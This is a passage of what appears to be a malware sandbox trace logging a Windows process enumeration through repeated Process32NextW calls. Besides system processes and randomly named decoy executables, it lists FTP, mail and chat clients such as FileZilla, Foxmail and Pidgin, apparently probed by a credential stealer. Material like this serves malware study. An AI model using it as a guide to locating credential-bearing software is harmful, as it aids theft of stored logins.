dwFlags=0x0, szExeFile="System")) returned 1 [0164.580] lstrlenW (lpString="System") returned 6 [0164.581] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.581] lstrlenW (lpString="smss.exe") returned 8 [0164.581] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.582] lstrlenW (lpString="csrss.exe") returned 9 [0164.582] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.583] lstrlenW (lpString="wininit.exe") returned 11 [0164.583] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.583] lstrlenW (lpString="csrss.exe") returned 9 [0164.584] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.584] lstrlenW (lpString="winlogon.exe") returned 12 [0164.584] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.585] lstrlenW (lpString="services.exe") returned 12 [0164.585] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.586] lstrlenW (lpString="lsass.exe") returned 9 [0164.586] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.586] lstrlenW (lpString="svchost.exe") returned 11 [0164.586] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.587] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.587] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.587] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.587] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.588] lstrlenW (lpString="svchost.exe") returned 11 [0164.588] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.588] lstrlenW (lpString="dwm.exe") returned 7 [0164.589] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x62, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.589] lstrlenW (lpString="svchost.exe") returned 11 [0164.589] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.590] lstrlenW (lpString="svchost.exe") returned 11 [0164.590] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.590] lstrlenW (lpString="svchost.exe") returned 11 [0164.590] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.591] lstrlenW (lpString="svchost.exe") returned 11 [0164.591] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.592] lstrlenW (lpString="svchost.exe") returned 11 [0164.592] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.592] lstrlenW (lpString="svchost.exe") returned 11 [0164.592] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.593] lstrlenW (lpString="svchost.exe") returned 11 [0164.593] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.593] lstrlenW (lpString="svchost.exe") returned 11 [0164.593] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.594] lstrlenW (lpString="svchost.exe") returned 11 [0164.594] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.594] lstrlenW (lpString="svchost.exe") returned 11 [0164.594] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0164.595] lstrlenW (lpString="spoolsv.exe") returned 11 [0164.595] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.595] lstrlenW (lpString="svchost.exe") returned 11 [0164.595] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0164.596] lstrlenW (lpString="audiodg.exe") returned 11 [0164.596] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0164.597] lstrlenW (lpString="sihost.exe") returned 10 [0164.597] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.597] lstrlenW (lpString="svchost.exe") returned 11 [0164.597] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.598] lstrlenW (lpString="taskhostw.exe") returned 13 [0164.598] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0164.598] lstrlenW (lpString="explorer.exe") returned 12 [0164.598] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0164.599] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0164.599] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0164.599] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0164.599] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0164.600] lstrlenW (lpString="Memory Compression") returned 18 [0164.600] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0164.690] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0164.690] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0164.691] lstrlenW (lpString="SearchUI.exe") returned 12 [0164.691] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0164.691] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0164.691] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.692] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0164.692] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0164.693] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0164.693] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0164.693] lstrlenW (lpString="workers.exe") returned 11 [0164.693] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0164.694] lstrlenW (lpString="succeed.exe") returned 11 [0164.694] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0164.694] lstrlenW (lpString="washer jar.exe") returned 14 [0164.694] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0164.695] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0164.695] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0164.696] lstrlenW (lpString="useful_courts.exe") returned 17 [0164.696] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0164.697] lstrlenW (lpString="compounds spanish.exe") returned 21 [0164.697] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0164.697] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0164.697] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0164.698] lstrlenW (lpString="try.exe") returned 7 [0164.698] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0164.698] lstrlenW (lpString="statuteide.exe") returned 14 [0164.698] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0164.699] lstrlenW (lpString="invite.exe") returned 10 [0164.699] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0164.700] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0164.700] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0164.700] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0164.700] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0164.701] lstrlenW (lpString="modules_recommend.exe") returned 21 [0164.701] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0164.702] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0164.702] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.703] lstrlenW (lpString="svchost.exe") returned 11 [0164.703] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0164.703] lstrlenW (lpString="3dftp.exe") returned 9 [0164.703] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0164.704] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0164.704] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0164.705] lstrlenW (lpString="alftp.exe") returned 9 [0164.705] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0164.705] lstrlenW (lpString="barca.exe") returned 9 [0164.705] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0164.706] lstrlenW (lpString="bitkinex.exe") returned 12 [0164.706] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0164.707] lstrlenW (lpString="coreftp.exe") returned 11 [0164.707] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0164.708] lstrlenW (lpString="far.exe") returned 7 [0164.708] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0164.709] lstrlenW (lpString="filezilla.exe") returned 13 [0164.709] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0164.710] lstrlenW (lpString="flashfxp.exe") returned 12 [0164.710] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0164.711] lstrlenW (lpString="fling.exe") returned 9 [0164.711] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0164.712] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0164.712] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0164.713] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0164.713] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0164.714] lstrlenW (lpString="icq.exe") returned 7 [0164.714] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0164.715] lstrlenW (lpString="leechftp.exe") returned 12 [0164.715] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0164.717] lstrlenW (lpString="ncftp.exe") returned 9 [0164.717] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0164.718] lstrlenW (lpString="notepad.exe") returned 11 [0164.718] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0164.720] lstrlenW (lpString="operamail.exe") returned 13 [0164.720] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0164.721] lstrlenW (lpString="pidgin.exe") returned 10 [0164.721] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 